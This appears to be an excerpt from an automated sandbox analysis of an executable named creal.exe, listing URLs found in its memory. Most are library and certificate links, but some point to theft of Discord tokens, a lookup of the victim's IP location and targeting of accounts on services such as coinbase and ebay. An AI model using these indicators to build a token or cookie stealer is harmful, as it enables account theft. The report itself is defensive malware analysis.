Strict-Transport-Security: max-age=15552000; includeSubDomains | X-Content-Type-Options: nosniff | X-DNS-Prefetch-Control: off | X-Download-Options: noopen | X-Frame-Options: SAMEORIGIN | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 0 | ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A" | X-Robots-Tag: noindex, nofollow
            Source: creal.exe, 00000002.00000002.1572428331.00000185BD0EC000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458123103.00000185BC815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
            Source: creal.exe, 00000002.00000002.1565300516.00000185BC270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
            Source: creal.exe, 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535972591.00000185BC75B000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518240184.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1540883889.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1562299712.00000185BBDE8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508070108.00000185BBE9C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535358960.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1526002563.00000185BC756000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543014171.00000185BBEBA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1533291208.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515797188.00000185BBEB3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1510991480.00000185BC7C5000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519379988.00000185BC753000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514920740.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1569242001.00000185BC742000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1531272524.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, 
creal.exe, 00000002.00000003.1516736251.00000185BBDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
            Source: creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: creal.exe, 00000002.00000003.1507517761.00000185BBBF4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519132495.00000185BB856000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516398623.00000185BBB87000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458778204.00000185BB83D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1525161571.00000185BBBF8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543590405.00000185BB859000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1398441028.00000185BBBB7000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1400715482.00000185BB849000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1560090054.00000185BBBF8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1524890898.00000185BBBE0000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1398046489.00000185BBBB7000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1517238738.00000185BBBB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
            Source: creal.exe, 00000002.00000003.1508070108.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1541236090.00000185BBF04000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1534642652.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1530994321.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515797188.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
            Source: creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/r
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
            Source: creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/r
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://disney.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
            Source: creal.exe, 00000002.00000003.1532043339.00000185BBB8F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516398623.00000185BBB87000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1528235232.00000185BBB88000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1530427715.00000185BBB8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
            Source: creal.exe, 00000002.00000003.1552936616.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518240184.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514920740.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1531272524.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514358388.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
            Source: creal.exe, 00000002.00000002.1572616442.00000185BD1CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)z$
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)z
            Source: creal.exe, 00000002.00000002.1572428331.00000185BD000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
            Source: creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/
            Source: creal.exe, 00000002.00000002.1572961646.00000185BD310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/8.46.123.189
            Source: creal.exe, 00000002.00000002.1572961646.00000185BD310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/8.46.123.189ion
            Source: creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/z
            Source: creal.exe, 00000002.00000002.1563972254.00000185BC060000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com)z
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBF48000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1507461152.00000185BBF48000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535155436.00000185BBF49000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1541789540.00000185BBF54000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1542109327.00000185BBF5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
            Source: creal.exe, 00000002.00000002.1554436074.00000185B9850000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548117141.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508417882.00000185B9846000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1546008995.00000185B984A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1547899486.00000185B984F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548377923.00000185B986D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508816820.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1551754192.00000185B986E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1554656745.00000185B986F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: creal.exe, 00000002.00000002.1563972254.00000185BC060000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1568700343.00000185BC4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
            Source: creal.exe, 00000000.00000003.1594425280.0000018FDF277000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1762255137.0000025EFD911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
            Source: creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
            Source: creal.exe, 00000002.00000002.1563707554.00000185BBF60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
            Source: creal.exe, 00000002.00000002.1558402785.00000185BB860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
            Source: creal.exe, 00000002.00000002.1554844146.00000185BB1FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: creal.exe, 00000002.00000002.1554656745.00000185B986F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: creal.exe, 00000002.00000002.1554436074.00000185B9850000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548117141.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508417882.00000185B9846000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1546008995.00000185B984A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1547899486.00000185B984F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548377923.00000185B986D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508816820.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1551754192.00000185B986E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1554656745.00000185B986F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: creal.exe, 00000002.00000002.1555512813.00000185BB346000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1396487176.00000185BB775000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518970587.00000185BB343000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543769837.00000185BB346000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516110716.00000185BB340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
            Source: creal.exe, 00000002.00000002.1563707554.00000185BBF60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396
            Source: creal.exe, 00000002.00000002.1554436074.00000185B9850000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548117141.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508417882.00000185B9846000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1546008995.00000185B984A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1547899486.00000185B984F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1548377923.00000185B986D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508816820.00000185B9868000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1551754192.00000185B986E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1554656745.00000185B986F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: creal.exe, 00000002.00000002.1572428331.00000185BD000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
            Source: creal.exe, 00000002.00000003.1524890898.00000185BBC01000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1507517761.00000185BBBF4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519492705.00000185BC7A3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1560136900.00000185BBC01000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1545831403.00000185BC7A5000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458858671.00000185BC79C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1507238550.00000185BC79C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515252925.00000185BBC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
